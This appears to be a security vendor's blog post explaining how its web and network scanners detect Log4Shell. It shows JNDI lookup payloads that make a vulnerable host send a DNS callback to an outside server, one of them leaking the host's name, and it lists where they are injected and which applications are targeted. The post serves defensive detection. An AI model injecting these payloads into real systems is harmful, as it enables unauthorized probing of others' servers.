Security research

How we detect and exploit Log4Shell to help you find targets using vulnerable Log4j versions

Updated at
How we detect Log4Shell on
Article tags

We’re breaking down our technique for detecting CVE-2021-44228 (Log4Shell) because we believe our users should understand what’s happening behind the scanners so they can avoid a false sense of security.

In complex situations such as this one, it’s helpful to be open, realistic, and share knowledge, so we can all contribute to managing risk the best we can.

There is already a dedicated Log4Shell article where we describe the Log4Shell vulnerability in detail, so we won’t spend too much time on it here. However, how our tools carry out that detection deserves specific attention.

We, at, have added detection capabilities for this Log4j vulnerability with the following tools:

These scanners implement distinct detection techniques that we describe below.

We also added exploitation capabilities for the Log4j vulnerability in our Sniper tool.

We recommend using the Website Scanner as the primary detection tool for Log4Shell. Here’s why.

The scanner uses a payload like ${jndi:dns://private-dns-server/} and injects it in various locations in the target application. If the app is vulnerable, it initiates a DNS request to one of our private DNS servers (hosted in our cloud environment).

Since the Website Scanner is actually a full-blown web vulnerability scanner, it also performs crawling of the target application and indexes all the injection points. Thus, the Log4Shell payload is injected in:

  • Base URL

  • HTTP headers (more than 50 headers)

  • All application input fields from HTML forms (e.g. username, search, etc.), which it obtains by crawling the app.

Log4j website scanner result

Because the Website Scanner has extensive coverage of the target application, we believe it is the most effective detection method for Log4Shell.

Even though this technique is highly accurate, it has one limitation

  • Our detection is synchronous, meaning the scanner expects the vulnerable app to immediately process the request and send the LDAP request to our server. However, if the application calls the Log4j functionality later (e.g. after a few minutes), we probably won’t detect it as vulnerable.

Log4Shell detection using the Network Scanner

The custom detection modules we are implementing in the Network Scanner have a different approach to detecting Log4Shell.

The scanner uses a payload like ${jndi:dns://${hostName}.private-dns-server} and injects it in the URL or in the custom headers. If the app is vulnerable, it initiates a DNS request to one of our private DNS servers (hosted in our cloud environment).

Log4j RCE detection

Instead of looking at the target as a generic web application, the Network Scanner searches for the vulnerability in specific or well-known applications that are using Log4j, such as:

  • Apache Flink

  • Apache Tomcat

  • Apache Druid

  • Apache Struts2

  • Apache Solr

  • VMware vCenter

  • MobileIron

  • Elasticsearch

In this case, the scanner won’t do any crawling of the target application, but it will inject the payload (which is similar to Website Scanner’s) in:

  • Base URL

  • Multiple headers (the same as Website Scanner)

  • Specific input fields, depending on the target application.

We implemented this detection with the Network Scanner by using Sniper Automatic Exploiter modules, which will have the additional capability to exploit the vulnerability when the user also wants to prove that the risk is real. You will be able to perform exploitation exclusively with Sniper.

Sniper exploitation summary

local users found with Sniper

files extracted with Sniper

Run a focused scan faster: use the dedicated Log4Shell pentest robot

To help you with identifying potential issues faster, we’ve created a ready-to-use pentest robot that scans for Log4Shell exclusively using the Website Scanner – with a predefined set of options.

As you can see below, only the “Log4j Remote Code Execution” attack option is enabled in this robot, making this scan much faster than the default one. 

Website scanner attack options

Just add your assets to the Targets page, then scan them all using the Log4Shell pentest robot (which you can also schedule to run when you need it):

Log4Shell pentest robot

log4shell website scanner result

Using this specialized robot helps both other pentesters and us by decreasing the load that full scans create. Thank you for that!

The right tools can help you amplify your knowledge

It is really important to understand what your tools are doing behind the scenes so you have a strong assurance that your security posture is accurate.

While there is no perfect solution for flawless Log4Shell detection, using multiple tools increases your chances of having good coverage of the problem.

We’ll keep you posted as we roll out new updates on the platform!

Get fresh security research

In your inbox. (No fluff. Actionable stuff only.)

I can see your vulns image

Related articles

Suggested articles

Discover our ethical hacking toolkit and all the free tools you can use!

Create free account


© 2013-2024 has a LinkedIn account it's very active on

Join over 45,000 security specialists to discuss career challenges, get pentesting guides and tips, and learn from your peers. Follow us on LinkedIn! has a YouTube account where you can find tutorials and useful videos

Expert pentesters share their best tips on our Youtube channel. Subscribe to get practical penetration testing tutorials and demos to build your own PoCs!

G2 award badge recognized as a Leader in G2’s Spring 2023 Grid® Report for Penetration Testing Software. Discover why security and IT pros worldwide use the platform to streamline their penetration and security testing workflow.

OWASP logo is a Corporate Member of OWASP (The Open Web Application Security Project). We share their mission to use, strengthen, and advocate for secure coding standards into every piece of software we develop.